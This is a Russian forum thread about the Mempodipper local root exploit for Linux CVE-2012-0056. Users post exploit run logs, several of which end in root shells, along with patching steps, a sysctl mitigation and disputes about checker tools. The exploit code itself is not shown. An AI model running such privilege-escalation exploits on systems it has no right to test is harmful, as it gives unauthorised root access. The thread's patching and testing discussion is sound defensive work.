===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/13961/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: /tmp/CVE-201209956 -o ADDRESS
[-] Example: /tmp/CVE-201209956 -o 0x402178

Не работает на 3.0.4-hardened-r5, другого и не ожидал.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

168. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Пиу on 24-Янв-12, 17:09 
на обычной генте тоже не работает - /bin/su закрыт на чтение
Ответить | Правка | ^ к родителю #128 | Наверх | Cообщить модератору

129. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от FiX лень логиниться on 24-Янв-12, 09:46 
В арче запатчено:

/var/abs/core/linux $ cat PKGBUILD |grep CVE-2012-0056
        'CVE-2012-0056.patch')
  # patch for CVE-2012-0056
  patch -p1 -i "${srcdir}/CVE-2012-0056.patch"

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

131. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от EuPhobos (ok) on 24-Янв-12, 09:58 
Дополнения к новости совсем не радуют.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

133. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 24-Янв-12, 09:59 
> Дополнения к новости совсем не радуют.

Какие именно? :D

Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

164. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 15:50 
>> Дополнения к новости совсем не радуют.
> Какие именно? :D

То, что вместе с патчем в убунту прилетела новая дыра.

Ответить | Правка | ^ к родителю #133 | Наверх | Cообщить модератору

140. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Andrey Mitrofanov on 24-Янв-12, 10:46 
> Дополнения к новости совсем не радуют.

Как ни странно, дополнение про Андроид может кого-то и порадовать: очередной иксплоит, чтоб разлочить (вдруг получится?) пошифку... Главное, _терпеть_ и не ставить FOTA (ф*инг обновления "по воздуху"). %) Держаться!

(Хотя с другой стороны, на этих ваших телефонах какое-то 2.6.35+xyz. Когда ещё к нему приспособят...)

Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

135. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от artem email(??) on 24-Янв-12, 10:16 
Fedora 16.

uname -a
Linux notebook.blahblah 3.1.9-1.fc16.i686 #1 SMP Fri Jan 13 17:14:41 UTC 2012 i686 i686 i386 GNU/Linux

$ ./a.out
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4736/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x1524.
[+] Calculating su padding.
[+] Seeking to offset 0x1502.
[+] Executing su with shellcode.
[artem@notebook eatme]$ whoami
artem

Как-то так, в общем.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

139. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от AlexYeCu (ok) on 24-Янв-12, 10:45 
Опа. Может поэтому федоровцы и не шевелятся?
Ответить | Правка | ^ к родителю #135 | Наверх | Cообщить модератору

142. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от artem email(??) on 24-Янв-12, 11:10 
Возможно, но вот что есть, то есть. не сработало оно у меня. :)
Ответить | Правка | ^ к родителю #139 | Наверх | Cообщить модератору

143. "В ядре Linux найдена локальная root-уязвимость"  +2 +/
Сообщение от Tav (ok) on 24-Янв-12, 11:22 
«Note: Fedora defaults to /proc/sys/kernel/randomize_va_space = 2, which makes
this more difficult to exploit.»

https://bugzilla.redhat.com/show_bug.cgi?id=782681

Ответить | Правка | ^ к родителю #135 | Наверх | Cообщить модератору

136. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от SubGun (ok) on 24-Янв-12, 10:16 
Сколько народу поскачивало эксплойт :DDD Надо бы туда вирусняк затолкать, чтобы веселей было.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

137. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 24-Янв-12, 10:28 
> Сколько народу поскачивало эксплойт :DDD Надо бы туда вирусняк затолкать, чтобы веселей
> было.

Надо было. А то я зря сидел смотрел что оно делает в виртуалке, думал хоть бэкдур какой в комплекте идёт :(

Ответить | Правка | ^ к родителю #136 | Наверх | Cообщить модератору

138. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 10:41 
а почитать исходник не судьбец, видимо.
Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

141. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от dAverk email(??) on 24-Янв-12, 10:48 
> а почитать исходник не судьбец, видимо.

Читал, но всё равно для собственного спокойствия проверил :)

Ответить | Правка | ^ к родителю #138 | Наверх | Cообщить модератору

155. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от 57349817591 on 24-Янв-12, 14:12 
Неосилила настройку приоритетов репозиториев?
Ответить | Правка | ^ к родителю #136 | Наверх | Cообщить модератору

149. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 12:51 
В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

171. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от vle email(ok) on 24-Янв-12, 17:23 
> В Gentoo на 3.0.4-hardened-r4 не работает, на 3.0.6-gentoo - работает.

На то он собственно и hardened.
В том его задача.

Ответить | Правка | ^ к родителю #149 | Наверх | Cообщить модератору

172. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 24-Янв-12, 17:26 
А кто-нибудь может пояснить зачем вообще нужна поддержка записи в /proc/pid/mem ? Для чего её добавили ? Чтение ещё понятно, для отладки полезная вещь. Но для чего нужен доступ на запись в память другого процесса ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

177. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 24-Янв-12, 21:34 
для scanmem, например.
Ответить | Правка | ^ к родителю #172 | Наверх | Cообщить модератору

196. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним (??) on 25-Янв-12, 01:21 
> для scanmem, например.

Ну вот вынести в отдельный sysctl, чтоли. Надо далеко не всем, а потенциально - некислый источник дыр. Вообще, если юзер занят дебагом, защищаться от него довольно тухлое начинание.

Ответить | Правка | ^ к родителю #177 | Наверх | Cообщить модератору

197. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 01:26 
> Ну вот вынести в отдельный sysctl, чтоли.

новый патч так и делает, тащемта: «Add the "proc_pid_mem" sysctl to control whether or not /proc/pid/mem is allowed to work: 0: disabled, 1: read only, 2: read/write (default).»

Ответить | Правка | ^ к родителю #196 | Наверх | Cообщить модератору

173. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик email on 24-Янв-12, 19:24 

ksodete@dev-tester ~/explo $ uname -a
Linux dev-tester 3.1.5-gentoo #8 SMP Sun Jan 22 02:17:33 EET 2012 x86_64 Intel(R) Core(TM)2 Duo CPU E7300 @ 2.66GHz GenuineIntel GNU/Linux
ksodete@dev-tester ~/explo $ whoami
ksodete
ksodete@dev-tester ~/explo $ gcc -o in mempodipper.c
ksodete@dev-tester ~/explo $ ./in
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12942/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x402298.
[+] Calculating su padding.
[+] Seeking to offset 0x40227d.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2# rm -r /te.cpp
sh-4.2#
...
Бл***

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

174. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик email on 24-Янв-12, 21:16 
Негентушный способ для гентушников. Получилось закрыть дырку. Правда, сделал немного тупо, но ничего, работает.
1. # cd /usr/src/linux
2. nano 2100_proc-mem-handling-fix.patch
3. Копипастинг текста отсюда: http://sources.gentoo.org/viewcvs.py/gentoo-x86/sys-kernel/p...

4. ctrl + o
5. # cd fs/proc/
6. # patch ../../2100_proc-mem-handling-fix.patch
7. # make && make modules_install
8. cp arch/<arch>/boot/bzImage /boot/kernel-<version>-gentoo
9. # reboot

ksodete@dev-tester ~ $ ./in
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4157/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x402298.
[+] Calculating su padding.
[+] Seeking to offset 0x40227d.
[+] Executing su with shellcode.
ksodete@dev-tester ~ $ whoami
ksodete
ksodete@dev-tester ~ $

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

229. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Ващенаглухо (ok) on 27-Янв-12, 10:07 
что люди только не придумают,лишь бы не использовать hardened-sources
Ответить | Правка | ^ к родителю #174 | Наверх | Cообщить модератору

175. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик email on 24-Янв-12, 21:17 
Ой, сори-сори
---6. # patch ../../2100_proc-mem-handling-fix.patch
+++6. # patch -i ../../2100_proc-mem-handling-fix.patch
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

198. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sw00p aka Jerom on 25-Янв-12, 01:31 
на RHEL старом ваще не компилится )))

2.6.18-8.el5

ругается на pipe2 (заменил на пайп всё равно не работает - висит на чтении)

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Ptrace_traceme'ing process.
[+] Waiting for ptraced child to give output on syscalls.


---------------

скачал под федору эксплоит с использованием не su а gpasswd - тоже не сработал - даже отрубил  ASLR

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3593/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049900.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x80498f1.
[+] Executing gpasswd with shellcode.
unknown group: 1۰1۰.1ɳ?1�hn/shh//bi��-iR��PS��0

gpasswd: Permission denied

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

199. "В ядре Linux найдена локальная root-уязвимость"  +1 +/
Сообщение от arisu (ok) on 25-Янв-12, 01:33 
во-первых: сказали же: 2.6.39.

во-вторых: если
> ругается на pipe2

препятствие — лучше никогда ничего не компилируй больше.

Ответить | Правка | ^ к родителю #198 | Наверх | Cообщить модератору

200. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sw00p aka Jerom on 25-Янв-12, 01:43 
>>препятствие — лучше никогда ничего не компилируй больше.

спасибо за совет - поэтому я три года не апдейтил редхат )))

вот лучше этим проверьте а не эксплоиты запускайте
http://grsecurity.net/~spender/correct_proc_mem_reproducer.c

write: Invalid argument
not vulnerable

Ответить | Правка | ^ к родителю #199 | Наверх | Cообщить модератору

201. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 01:56 
> вот лучше этим проверьте а не эксплоиты запускайте

а зачем мне этот странный код? как будто я не понял, что делает сплойт, как, зачем и почему. кстати, красиво.

и да, патч-лечилку я себе на 3.1.5 уже бэкпортанул (нет, я не хочу ядро новее).

Ответить | Правка | ^ к родителю #200 | Наверх | Cообщить модератору

204. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sw00p aka Jerom on 25-Янв-12, 02:21 
бэээээээээээ старый либси ))
Ответить | Правка | ^ к родителю #201 | Наверх | Cообщить модератору

205. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик email(ok) on 25-Янв-12, 03:16 
Вот и у меня подобная ситуация: качать ядро 3.2.x (>70 МБ) через GPRS в 3 кб/с с пингом >5000 мс не хочется, а если после патчинга ядра компьютер не посыпится/сгорит/заговорит_человеческим_голосом, то почему бы и не пропатчить вручную? =)
Ответить | Правка | ^ к родителю #201 | Наверх | Cообщить модератору

207. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 03:43 
ну, на 3.1.5 патч просто так не ложится, надо немного знать, что там в ведре творится и подпилить. или просто вкорячить жестокий r/o на /proc/pid/mem (что я и сделал, тащемта, особо не напрягаясь).
Ответить | Правка | ^ к родителю #205 | Наверх | Cообщить модератору

213. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик (ok) on 25-Янв-12, 04:19 
<offtop>
Жёстко =)
Я тоже подумывал сделать /proc/pid/mem ридонли, но передумал, авось это чем-то чревато. Если  было бы всё так просто, то в качестве решения написали бы в именно ограничение прав на /proc/pid/mem. Тем более, я вообще не знал, что можно было наложить патч на ядро с помощью patch -i file.patch, находясь в папке с файлом, который надо пропатчить. Но так как я люблю тыкать пальцем в небо - сделал так, как и написал в посте 1.174 (или как они нумеруются, не пойму).
</offtop>
Ответить | Правка | ^ к родителю #207 | Наверх | Cообщить модератору

214. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 04:55 
> Я тоже подумывал сделать /proc/pid/mem ридонли, но передумал, авось это чем-то чревато.

да пофигу, в принципе. то есть, у «средниего юзера» ничего не сломается.

ага, то патч без нового sysctl. для него «чекер» не подходит, там другой принцип закрытия дырки. доверяй только сплойту. %-)

Ответить | Правка | ^ к родителю #213 | Наверх | Cообщить модератору

206. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик email(ok) on 25-Янв-12, 03:22 
ksodete@dev-tester ~/explo $ gcc -o cp cp.c
ksodete@dev-tester ~/explo $ ./cp
vulnerable
Да, пичяль-пичялюшка-пичялька, и это даже после патчинга /usr/src/linux/fs/proc/base.c
Единственное, что я, тупак в C/C++ и арх. ядра, могу сказать, это "посмотрим, шо будет дальше".
Ответить | Правка | ^ к родителю #200 | Наверх | Cообщить модератору

208. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 03:44 
> Да, пичяль-пичялюшка-пичялька, и это даже после патчинга /usr/src/linux/fs/proc/base.c

sysctl -w kernel.proc_pid_mem=1 сделал? по-умолчанию всё разрешено.

Ответить | Правка | ^ к родителю #206 | Наверх | Cообщить модератору

209. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик (ok) on 25-Янв-12, 04:07 
Честно говоря - не делал.
Ответ команды:
# error: "kernel.proc_pid_mem" is an unknown key
если сделал что-то не так - сори, значит просто не понял вопрос.
Ответить | Правка | ^ к родителю #208 | Наверх | Cообщить модератору

210. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 04:08 
> Честно говоря — не делал.
> Ответ команды:
> # error: «kernel.proc_pid_mem» is an unknown key
> если сделал что-то не так — сори, значит просто не понял вопрос.

или неверно наложил патч (наложил не весь/патч не наложился), или забыл ребутнуться в новое ядро, или я не знаю. %-)

Ответить | Правка | ^ к родителю #209 | Наверх | Cообщить модератору

212. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик (ok) on 25-Янв-12, 04:17 
Скорее всего первое, ибо я параноидально, после каждого рекомпилинга ядра, делаю cp arch/<arch>/boot/bzImage в папку /boot с заменой оригинального ядра. Но спасибо за помощь) А то я вообще в линуксах сравнительно недавно, в генту - ещё "недавнее", да и школотятских мозгов на всё не хватает.
Ответить | Правка | ^ к родителю #210 | Наверх | Cообщить модератору

215. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от arisu (ok) on 25-Янв-12, 04:56 
доверяй сплойту, не доверяй «чекеру». гентушный патч по логике не такой, как из LKML. так что проверяй именно запуском сплойта.
Ответить | Правка | ^ к родителю #212 | Наверх | Cообщить модератору

216. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Йоптик (ok) on 25-Янв-12, 16:13 
> доверяй сплойту, не доверяй «чекеру». гентушный патч по логике не такой, как
> из LKML. так что проверяй именно запуском сплойта.

Кстати, Вы оказались абсолютно правы =) Дело в том, что я накладывал патч от Линуса Торвальдса — тот самый, от 21-го числа, а не новый, с возможностю выбора трёх вариантов, поэтому и команда не сработала, поэтому и чекер говорит "vulnerable". Тем не менее, как факт, эксплойт уже не срабатывает. Так что это я ступил, сори ^_^"

Ответить | Правка | ^ к родителю #215 | Наверх | Cообщить модератору

219. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от arisu (ok) on 25-Янв-12, 19:42 
да ерунда, не всем же ядерными хакерами быть. заработало (точнее, не заработало %-) — и хорошо.

а вот некоторым полезно бы не выкладывать «чекеры», которые на самом деле проверяют вовсе не то, что надо.

если интересно — то: гентушный патч делает финт хвостом, разрешая писать не совсем в ту VM, в которую ожидается (в отличие от нового, который тупо право записи отбирает). поэтому «недочекер» и говорит, что "уязвимо": у него выходит записать *в свою же* VM. а вот у сплойта в чужую — уже не выходит, и потому сплойт не работает.

Ответить | Правка | ^ к родителю #216 | Наверх | Cообщить модератору

220. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sw00p aka Jerom on 25-Янв-12, 23:15 
>>а вот некоторым полезно бы не выкладывать «чекеры», которые на самом деле проверяют вовсе не то, что надо.

вы сначало на домен в сылке посмотрите потом тут из себя гуру стройте

пс: от вас я пока не увидел ни чекера ни сплоита, ни даже описания работы эксплоита

пс2: представляю как вы на продакшен сервере будете без чекера проверять поддверженность уязвимости, или вы собирались запускать эксплоит О_О ?

Ответить | Правка | ^ к родителю #219 | Наверх | Cообщить модератору

222. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от arisu (ok) on 26-Янв-12, 00:09 
> вы сначало на домен в сылке посмотрите потом тут из себя гуру
> стройте

и что я должен увидеть в имени домена? или сразу начинать бить земные поклоны?

> пс: от вас я пока не увидел ни чекера ни сплоита, ни
> даже описания работы эксплоита

а зачем мне повторять то, что уже сделано? подробнейшее же описание есть в блоге автора сплойта; если кто-то не умеет читать по-английски — то ему однозначно описание не нужно.

> пс2: представляю как вы на продакшен сервере будете без чекера проверять поддверженность
> уязвимости, или вы собирались запускать эксплоит О_О ?

не только «собрался», но и запускаю. потому что в отличие от тебя я полностью понимаю его код и принцип работы. а вот таких как ты к «продакшену» лучше не допускать, да. во избежание.

Ответить | Правка | ^ к родителю #220 | Наверх | Cообщить модератору

226. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Sw00p aka Jerom on 26-Янв-12, 14:05 
>>не только «собрался», но и запускаю.

удачи вам ))

Ответить | Правка | ^ к родителю #222 | Наверх | Cообщить модератору

227. "В ядре Linux найдена локальная root-уязвимость"  –1 +/
Сообщение от arisu (ok) on 26-Янв-12, 14:40 
> удачи вам ))

удача нужна тем, кто совершает шаманские действия не понимая их смысла. я к таким не отношусь.

Ответить | Правка | ^ к родителю #226 | Наверх | Cообщить модератору

223. "В ядре Linux найдена локальная root-уязвимость"  +/
Сообщение от Аноним email(??) on 26-Янв-12, 02:53 
подскажите пожалуйста как в debian закрыть багу?

apt-get install -y systemtap linux-image-$(uname -r)-dbg

выдает ошибку '('

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

224. "На слаке работает"  +/
Сообщение от ozs (ok) on 26-Янв-12, 03:27 
Slackware GNU/Linux kernel-3.0.17 Intel(R) Core(TM)2 Duo CPU
./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x80499e8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2695/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x80499dc.
[+] Executing su with shellcode.
sh-4.1# test
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

228. "Помогите!!!"  +/
Сообщение от Аноним (??) on 27-Янв-12, 08:39 
Я новичок в этом деле. Кто-нибудь, помогите!!! Пытался по всякому с шелкодами и эксплойтами. Не получилось((. Напишите, плиз, какие именно действия надо сделать и какие скрипты запустить. Буду очень благодарен.
ядро: uname -a
Linux localhost.localdomain 2.6.32-220.el6.i686 #1 SMP Tue Dec 6 16:15:40 GMT 2011 i686 i686 i386 GNU/Linux.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

230. "Помогите!!!"  +/
Сообщение от Йоптик (ok) on 27-Янв-12, 14:17 
Эм... Во-первых, в новости написано:
> Проблема наблюдается, начиная с ядра 2.6.39

Во вторых, я так и не пойму, что у тебя в целях? Запустить сплойт? А зачем?

Ответить | Правка | ^ к родителю #228 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру